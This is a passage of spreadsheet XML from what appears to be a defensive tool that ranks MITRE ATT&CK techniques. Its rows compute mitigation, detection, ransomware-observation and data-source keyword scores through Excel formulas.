      <c r="AC412" s="29" t="s">
        <v>1584</v>
      </c>
      <c r="AD412" s="25" t="str" cm="1">
        <f t="array" ref="AD412">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC412)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE412" s="25">
        <f>IF(AD412="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF412" s="25" t="str" cm="1">
        <f t="array" ref="AF412">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC412)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG412" s="25">
        <f>IF(AF412="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH412" s="25" t="str" cm="1">
        <f t="array" ref="AH412">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC412)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI412" s="25">
        <f>IF(AH412="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ412" s="25" t="str" cm="1">
        <f t="array" ref="AJ412">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC412)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK412" s="25">
        <f>IF(AJ412="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL412" s="25" t="str" cm="1">
        <f t="array" ref="AL412">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC412)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM412" s="25">
        <f>IF(AL412="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN412" s="59">
        <v>2</v>
      </c>
      <c r="AO412" s="51">
        <v>1</v>
      </c>
      <c r="AP412" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>8.6300000000000002E-2</v>
      </c>
      <c r="AQ412" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>6.5444444444444458E-2</v>
      </c>
      <c r="AR412" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>6.5444444444444458E-2</v>
      </c>
      <c r="AS412" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT412" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU41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13" spans="1:47" ht="48">
      <c r="A413" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.9504761904761906E-2</v>
      </c>
      <c r="B413" s="25">
        <f>SUM(H413,M413,V413)*(1+SUM(AE413,AG413,AI413,AK413,AM413))</f>
        <v>0.16171428571428573</v>
      </c>
      <c r="C413" s="25" t="s">
        <v>1585</v>
      </c>
      <c r="D413" s="25" t="s">
        <v>152</v>
      </c>
      <c r="E413" s="25" t="s">
        <v>1586</v>
      </c>
      <c r="F413" s="51">
        <v>1</v>
      </c>
      <c r="G413" s="51">
        <v>1</v>
      </c>
      <c r="H413" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I413">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J413">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K413">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L413">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M413" s="25">
        <v>0</v>
      </c>
      <c r="N413" s="51">
        <v>0</v>
      </c>
      <c r="O413" s="51">
        <v>1</v>
      </c>
      <c r="P413" s="51">
        <v>0</v>
      </c>
      <c r="Q413" s="51">
        <v>0</v>
      </c>
      <c r="R413" s="51">
        <v>2.5</v>
      </c>
      <c r="S413" s="51">
        <v>1</v>
      </c>
      <c r="T413" s="52" t="s">
        <v>1580</v>
      </c>
      <c r="U413" s="51">
        <v>3</v>
      </c>
      <c r="V413" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>4.2857142857142858E-2</v>
      </c>
      <c r="W413">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>4</v>
      </c>
      <c r="X413">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>7.2727272727272724E-2</v>
      </c>
      <c r="Y413">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>7.2727272727272724E-2</v>
      </c>
      <c r="Z413">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA413">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB413">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC413" s="29" t="s">
        <v>1553</v>
      </c>
      <c r="AD413" s="25" t="str" cm="1">
        <f t="array" ref="AD413">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC413)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE413" s="25">
        <f>IF(AD413="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF413" s="25" t="str" cm="1">
        <f t="array" ref="AF413">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC413)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG413" s="25">
        <f>IF(AF413="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH413" s="25" t="str" cm="1">
        <f t="array" ref="AH413">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC413)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI413" s="25">
        <f>IF(AH413="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ413" s="25" t="str" cm="1">
        <f t="array" ref="AJ413">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC413)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK413" s="25">
        <f>IF(AJ413="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL413" s="25" t="str" cm="1">
        <f t="array" ref="AL413">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC413)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM413" s="25">
        <f>IF(AL413="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN413" s="60">
        <v>1</v>
      </c>
      <c r="AO413" s="51">
        <v>1</v>
      </c>
      <c r="AP413" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.9504761904761906E-2</v>
      </c>
      <c r="AQ413" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>5.3904761904761907E-2</v>
      </c>
      <c r="AR413" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>5.3904761904761907E-2</v>
      </c>
      <c r="AS413" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT413" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU41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14" spans="1:47" ht="32.1">
      <c r="A414" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.1066666666666663E-2</v>
      </c>
      <c r="B414" s="25">
        <f>SUM(H414,M414,V414)*(1+SUM(AE414,AG414,AI414,AK414,AM414))</f>
        <v>0.17733333333333334</v>
      </c>
      <c r="C414" s="25" t="s">
        <v>1587</v>
      </c>
      <c r="D414" s="25" t="s">
        <v>152</v>
      </c>
      <c r="E414" s="25" t="s">
        <v>1588</v>
      </c>
      <c r="F414" s="51">
        <v>1</v>
      </c>
      <c r="G414" s="51">
        <v>1</v>
      </c>
      <c r="H414" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I414">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J414">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K414">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L414">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M414" s="25">
        <v>0</v>
      </c>
      <c r="N414" s="51">
        <v>0</v>
      </c>
      <c r="O414" s="51">
        <v>2</v>
      </c>
      <c r="P414" s="51">
        <v>4</v>
      </c>
      <c r="Q414" s="51">
        <v>1</v>
      </c>
      <c r="R414" s="51"/>
      <c r="S414" s="51">
        <v>0</v>
      </c>
      <c r="T414" s="51"/>
      <c r="U414" s="51">
        <v>0</v>
      </c>
      <c r="V414" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>3.3333333333333333E-2</v>
      </c>
      <c r="W414">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X414">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y414">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z414">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>7</v>
      </c>
      <c r="AA414">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>7.0000000000000007E-2</v>
      </c>
      <c r="AB414">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>7.0000000000000007E-2</v>
      </c>
      <c r="AC414" s="29" t="s">
        <v>1589</v>
      </c>
      <c r="AD414" s="25" t="str" cm="1">
        <f t="array" ref="AD414">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC414)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE414" s="25">
        <f>IF(AD414="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF414" s="25" t="str" cm="1">
        <f t="array" ref="AF414">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC414)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG414" s="25">
        <f>IF(AF414="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH414" s="25" t="str" cm="1">
        <f t="array" ref="AH414">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC414)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI414" s="25">
        <f>IF(AH414="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ414" s="25" t="str" cm="1">
        <f t="array" ref="AJ414">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC414)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK414" s="25">
        <f>IF(AJ414="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL414" s="25" t="str" cm="1">
        <f t="array" ref="AL414">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC414)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM414" s="25">
        <f>IF(AL414="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN414" s="60">
        <v>1</v>
      </c>
      <c r="AO414" s="51">
        <v>1</v>
      </c>
      <c r="AP414" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.1066666666666663E-2</v>
      </c>
      <c r="AQ414" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>5.9111111111111114E-2</v>
      </c>
      <c r="AR414" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>5.9111111111111114E-2</v>
      </c>
      <c r="AS414" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT414" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU41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15" spans="1:47">
      <c r="A415" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.3333333333333334E-2</v>
      </c>
      <c r="B415" s="25">
        <f>SUM(H415,M415,V415)*(1+SUM(AE415,AG415,AI415,AK415,AM415))</f>
        <v>0.13333333333333333</v>
      </c>
      <c r="C415" s="25" t="s">
        <v>1590</v>
      </c>
      <c r="D415" s="25" t="s">
        <v>1591</v>
      </c>
      <c r="E415" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F415" s="51">
        <v>1</v>
      </c>
      <c r="G415" s="51">
        <v>1</v>
      </c>
      <c r="H415" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I415">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J415">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K415">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L415">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M415" s="25">
        <v>0</v>
      </c>
      <c r="N415" s="51">
        <v>0</v>
      </c>
      <c r="O415" s="51">
        <v>7</v>
      </c>
      <c r="P415" s="51">
        <v>0</v>
      </c>
      <c r="Q415" s="51">
        <v>0</v>
      </c>
      <c r="R415" s="51"/>
      <c r="S415" s="51">
        <v>0</v>
      </c>
      <c r="T415" s="51"/>
      <c r="U415" s="51">
        <v>0</v>
      </c>
      <c r="V415" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>3.3333333333333333E-2</v>
      </c>
      <c r="W415">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X415">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y415">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z415">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>7</v>
      </c>
      <c r="AA415">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>7.0000000000000007E-2</v>
      </c>
      <c r="AB415">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>7.0000000000000007E-2</v>
      </c>
      <c r="AC415" s="29"/>
      <c r="AD415" s="25" t="str" cm="1">
        <f t="array" ref="AD415">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC415)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE415" s="25">
        <f>IF(AD415="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF415" s="25" t="str" cm="1">
        <f t="array" ref="AF415">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC415)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG415" s="25">
        <f>IF(AF415="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH415" s="25" t="str" cm="1">
        <f t="array" ref="AH415">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC415)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI415" s="25">
        <f>IF(AH415="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ415" s="25" t="str" cm="1">
        <f t="array" ref="AJ415">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC415)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK415" s="25">
        <f>IF(AJ415="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL415" s="25" t="str" cm="1">
        <f t="array" ref="AL415">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC415)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM415" s="25">
        <f>IF(AL415="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN415" s="51"/>
      <c r="AO415" s="51"/>
      <c r="AP415" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.3333333333333334E-2</v>
      </c>
      <c r="AQ415" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>4.4444444444444446E-2</v>
      </c>
      <c r="AR415" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>4.4444444444444446E-2</v>
      </c>
      <c r="AS415" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT415" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU41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16" spans="1:47">
      <c r="A416" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>8.3333333333333332E-3</v>
      </c>
      <c r="B416" s="25">
        <f>SUM(H416,M416,V416)*(1+SUM(AE416,AG416,AI416,AK416,AM416))</f>
        <v>8.3333333333333343E-2</v>
      </c>
      <c r="C416" s="25" t="s">
        <v>1592</v>
      </c>
      <c r="D416" s="25" t="s">
        <v>1593</v>
      </c>
      <c r="E416" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F416" s="51">
        <v>0</v>
      </c>
      <c r="G416" s="51">
        <v>1</v>
      </c>
      <c r="H416" s="35">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I416">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J416">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K416">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L416">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M416" s="25">
        <v>0</v>
      </c>
      <c r="N416" s="51">
        <v>0</v>
      </c>
      <c r="O416" s="51">
        <v>1</v>
      </c>
      <c r="P416" s="51">
        <v>0</v>
      </c>
      <c r="Q416" s="51">
        <v>2</v>
      </c>
      <c r="R416" s="52" t="s">
        <v>1594</v>
      </c>
      <c r="S416" s="51">
        <v>2</v>
      </c>
      <c r="T416" s="51"/>
      <c r="U416" s="51">
        <v>0</v>
      </c>
      <c r="V416" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>3.3333333333333333E-2</v>
      </c>
      <c r="W416">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>2</v>
      </c>
      <c r="X416">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>3.6363636363636362E-2</v>
      </c>
      <c r="Y416">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>3.6363636363636362E-2</v>
      </c>
      <c r="Z416">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>3</v>
      </c>
      <c r="AA416">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.03</v>
      </c>
      <c r="AB416">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.03</v>
      </c>
      <c r="AC416" s="29" t="s">
        <v>665</v>
      </c>
      <c r="AD416" s="25" t="str" cm="1">
        <f t="array" ref="AD416">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC416)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE416" s="25">
        <f>IF(AD416="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF416" s="25" t="str" cm="1">
        <f t="array" ref="AF416">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC416)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG416" s="25">
        <f>IF(AF416="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH416" s="25" t="str" cm="1">
        <f t="array" ref="AH416">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC416)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI416" s="25">
        <f>IF(AH416="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ416" s="25" t="str" cm="1">
        <f t="array" ref="AJ416">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC416)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK416" s="25">
        <f>IF(AJ416="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL416" s="25" t="str" cm="1">
        <f t="array" ref="AL416">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC416)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM416" s="25">
        <f>IF(AL416="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN416" s="52">
        <v>0</v>
      </c>
      <c r="AO416" s="51">
        <v>0</v>
      </c>
      <c r="AP416" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
